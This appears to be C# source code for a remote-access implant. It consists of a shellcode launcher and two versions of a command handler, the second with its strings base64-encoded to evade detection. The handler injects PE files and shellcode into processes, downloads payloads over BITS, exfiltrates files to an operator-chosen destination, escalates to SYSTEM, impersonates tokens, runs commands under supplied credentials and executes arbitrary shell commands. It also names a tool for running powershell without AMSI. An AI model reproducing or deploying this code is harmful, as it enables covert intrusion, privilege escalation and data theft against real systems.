public static void Main(byte[] shellCode, SysCallManager sysCall, int pid)
{
var obj = new LauncherShellCode();
var thr1 = new Thread(ExecuteShellCodeInMemory);
var a = new object[] { shellCode, sysCall, pid };
thr1.Start(a);
}
private void DoSomething(Content file)
{
var rps = "";
try
{
switch (file.Commands[0])
{
case "inject_pe":
{
var fileP = _tempPath + @"\" + _id;
var headers = "reqId: " + _auth + "\r\ncontid: " + ContId;
if (_jobsManager.Get(_id, fileP, headers, BITS.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND))
{
try
{
var pe = LoadPE(fileP);
var method = file.Commands[1];
var args = "";
for (var i = 2; i < file.Commands.Length; i++)
{
args += file.Commands[i];
if (i < file.Commands.Length)
{
args += " ";
}
}
var arguments = new string[] { args };
LauncherPE.Main(method, arguments, pe);
rps = "PE injected!";
}
catch (Exception)
{
rps = "ERR:Fatal error occurred while trying to inject the dll.\n";
}
}
else
{
rps = "ERR:Dll not found!\n";
}
break;
}
case "inject_shellcode":
{
var fileP = _tempPath + @"\" + _id;
var headers = "reqId: " + _auth + "\r\ncontid: " + ContId;
var pid = -1;
if (file.Commands.Length >= 2)
{
pid = int.Parse(file.Commands[1]);
}
if (_jobsManager.Get(_id, fileP, headers, BITS.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND))
{
byte[] sh;
GetEncryptedFileContent(fileP, out sh);
try
{
LauncherShellCode.Main(sh, _sysCall, pid);
rps = "Shellcode injected!\n";
}
catch (Exception)
{
rps = "ERR:Fatal error occurred while trying to inject shellCode.\n";
}
}
else
{
rps = "ERR:Shellcode file not found!\n";
}
break;
}
case "powershell":
{
rps = Utils.ExecuteCommand("powershell -V 2 /C Write-Host hi");
if (rps.Contains("hi"))
{
LauncherPowershell.Main(file.Commands[1], file.Commands[2]);
rps = "You should have your Powershell at " + file.Commands[1] + ":" + file.Commands[2] + "!\n";
}
else
{
rps = "Version 2 of Powershell not available. Try injecting EvilSalsa by CyberVaca in order to use powershell without am" + "si.\n";
}
break;
}
case "send":
{
var fileP = _tempPath + @"\" + _id;
var headers = "reqId: " + _auth + "\r\ncontid: " + ContId;
if (_jobsManager.Get(_id, fileP, headers, BITS.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND))
{
File.Copy(fileP, file.Commands[1], true);
rps = "Dowload finished.\n";
}
else
{
rps = "ERR:Download failed!\n";
}
break;
}
case "exfiltrate":
{
if (File.Exists(file.Commands[1]))
{
if (_jobsManager.Send(file.Commands[2], file.Commands[1]))
{
rps = "Exfiltration succeed.\n";
}
else
{
rps = "ERR:Exfiltration failed!\n";
}
}
else
{
rps = "ERR:File to exfiltrate not found!\n";
}
break;
}
case "getsystem":
{
if (Utils.IsHighIntegrity(_sysCall))
{
rps = _tokenManager.GetSystem() ? "We are System!\n" : "ERR:Process failed! Is this process running with high integrity level?\n";
}
else
{
rps = "ERR:Process failed! Is this process running with high integrity level?\n";
}
break;
}
case "rev2self":
{
TokenManager.Rev2Self();
rps = "Welcome back.\n";
break;
}
case "runas":
{
string user = "", domain = "", password = "";
var userData = file.Commands[1].Split('\\');
if (userData.Length == 1)
{
domain = ".";
user = userData[0];
}
else
{
domain = userData[0];
user = userData[1];
}
password = file.Commands[2];
rps = TokenManager.RunAs(domain, user, password) ? "Success!" : "ERR:Invalid credentials.";
break;
}
case "list":
{
rps = GetProcessInfo();
break;
}
case "impersonate":
{
try
{
if (_tokenManager.Impersonate(int.Parse(file.Commands[1])))
{
rps = "Impersonation achieved!\n";
}
else
{
rps = "ERR: Not enough privileges!\n";
}
}
catch
{
rps = "ERR: Impersonation failed!\n";
}
break;
}
case "exit":
{
Environment.Exit(0);
break;
}
default:
{
rps = Utils.ExecuteCommand(file.Commands[0]);
break;
}
}
}
catch
{
rps = "ERR: Something went wrong!";
}
var response = new Response(rps, _auth);
var filePath = _tempPath + @"\" + _id + ".txt";
EncryptResponseIntoFile(filePath, response);
TrySend(filePath);
}
private void DoSomething(Content file)
{
var rps = "";
try
{
switch (file.Commands[0])
{
case "inject_pe":
{
var fileP = _tempPath + @"\" + _id;
var headers = "reqId: " + _auth + "\r\ncontid: " + _contId;
if (_jobsManager.Get(_id, fileP, headers, BITS.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND))
{
try
{
var pe = LoadPE(fileP);
var method = file.Commands[1];
var args = "";
for (var i = 2; i < file.Commands.Length; i++)
{
args += file.Commands[i];
if (i < file.Commands.Length)
{
args += " ";
}
}
var arguments = new string[] { args };
LauncherPE.Main(method, arguments, pe);
rps = Encoding.UTF8.GetString(Convert.FromBase64String("UEUgaW5qZWN0ZWQh"));
}
catch (Exception)
{
rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOkZhdGFsIGVycm9yIG9jY3VycmVkIHdoaWxlIHRyeWluZyB0byBpbmplY3QgdGhlIGRsbC4="));
}
}
else
{
rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOkRsbCBub3QgZm91bmQh"));
}
break;
}
case "inject_shellcode":
{
var fileP = _tempPath + @"\" + _id;
var headers = "reqId: " + _auth + "\r\ncontid: " + _contId;
var pid = -1;
if (file.Commands.Length >= 2)
{
pid = int.Parse(file.Commands[1]);
}
if (_jobsManager.Get(_id, fileP, headers, BITS.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND))
{
byte[] sh;
GetEncryptedFileContent(fileP, out sh);
try
{
LauncherShellCode.Main(sh, _sysCall, pid);
rps = Encoding.UTF8.GetString(Convert.FromBase64String("U2hlbGxjb2RlIGluamVjdGVkIQ=="));
}
catch (Exception)
{
rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOkZhdGFsIGVycm9yIG9jY3VycmVkIHdoaWxlIHRyeWluZyB0byBpbmplY3QgdGhlIHNoZWxsY29kZS4="));
}
}
else
{
rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOlNoZWxsY29kZSBmaWxlIG5vdCBmb3VuZCE="));
}
break;
}
case "powershell":
{
rps = Utils.ExecuteCommand(Encoding.UTF8.GetString(Convert.FromBase64String("cG93ZXJzaGVsbCAtViAyIC9DIFdyaXRlLUhvc3QgaGk=")), _sysCall);
if (rps.Contains("hi"))
{
LauncherPowershell.Main(file.Commands[1], file.Commands[2]);
rps = Encoding.UTF8.GetString(Convert.FromBase64String("WW91IHNob3VsZCBoYXZlIHlvdXIgUG93ZXJzaGVsbCBhdCA=")) + file.Commands[1] + ":" + file.Commands[2] + "!\n";
}
else
{
rps = Encoding.UTF8.GetString(Convert.FromBase64String(
"VmVyc2lvbiAyIG9mIFBvd2Vyc2hlbGwgbm90IGF2YWlsYWJsZS4gVHJ5IGluamVjdGluZyB" +
"FdmlsU2Fsc2EgYnkgQ3liZXJWYWNhIGluIG9yZGVyIHRvIHVzZSBwb3dlcnNoZWxsIHdpdGhvdXQgYW0=")) + "si.\n";
}
break;
}
case "send":
{
var fileP = _tempPath + @"\" + _id;
var headers = "reqId: " + _auth + "\r\ncontid: " + _contId;
if (_jobsManager.Get(_id, fileP, headers, BITS.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND))
{
File.Copy(fileP, file.Commands[1], true);
rps = Encoding.UTF8.GetString(Convert.FromBase64String("RG93bG9hZCBmaW5pc2hlZC4="));
}
else
{
rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOkRvd25sb2FkIGZhaWxlZCE="));
}
break;
}
case "exfiltrate":
{
if (File.Exists(file.Commands[1]))
{
if (_jobsManager.Send(file.Commands[2], file.Commands[1]))
{
rps = Encoding.UTF8.GetString(Convert.FromBase64String("RXhmaWx0cmF0aW9uIHN1Y2NlZWQu"));
}
else
{
rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOkV4ZmlsdHJhdGlvbiBmYWlsZWQh"));
}
}
else
{
rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOkZpbGUgdG8gZXhmaWx0cmF0ZSBub3QgZm91bmQh"));
}
break;
}
case "getsystem":
{
if (Utils.IsHighIntegrity(_sysCall))
{
rps = _tokenManager.GetSystem(_sysCall) ? Encoding.UTF8.GetString(Convert.FromBase64String("V2UgYXJlIFN5c3RlbSE=")) :
Encoding.UTF8.GetString(Convert.FromBase64String("V2UgYXJlIFN5c3RlbSFcbkVS" +
"UjpQcm9jZXNzIGZhaWxlZCEgSXMgdGhpcyBwcm9jZXNzIHJ1bm5pbmcgd2l0aCBoaWdoIGludGVncml0eSBsZXZlbD8="));
}
else
{
rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOlByb2Nlc3MgZmFpbGVkISBJcyB0aGlzIHByb2Nlc3MgcnVubmluZyB3aXRoIGhpZ2ggaW50ZWdyaXR5IGxldmVsPw=="));
}
break;
}
case "rev2self":
{
TokenManager.Rev2Self();
rps = "Welcome back.\n";
break;
}
case "runas":
{
string user = "", domain = "", password = "";
var userData = file.Commands[1].Split('\\');
if (userData.Length == 1)
{
domain = ".";
user = userData[0];
}
else
{
domain = userData[0];
user = userData[1];
}
password = file.Commands[2];
rps = TokenManager.RunAs(domain, user, password) ? "Success!" : Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOkludmFsaWQgY3JlZGVudGlhbHMu"));
break;
}
case "list":
{
rps = GetProcessInfo();
break;
}
case "impersonate":
{
try
{
if (_tokenManager.Impersonate(int.Parse(file.Commands[1]), _sysCall))
{
rps = Encoding.UTF8.GetString(Convert.FromBase64String("SW1wZXJzb25hdGlvbiBhY2hpZXZlZCE="));
}
else
{
rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOiBOb3QgZW5vdWdoIHByaXZpbGVnZXMh"));
}
}
catch
{
rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOiBJbXBlcnNvbmF0aW9uIGZhaWxlZCE="));
}
break;
}
case "exit":
{
Environment.Exit(0);
break;
}
default:
{
rps = Utils.ExecuteCommand(file.Commands[0], _sysCall);
break;
}
}
}
catch
{
rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOiBTb21ldGhpbmcgd2VudCB3cm9uZyE="));
}
var response = new Response(rps, _auth);
var filePath = _tempPath + @"\" + _id + ".txt";
EncryptResponseIntoFile(filePath, response);
TrySend(filePath);
}
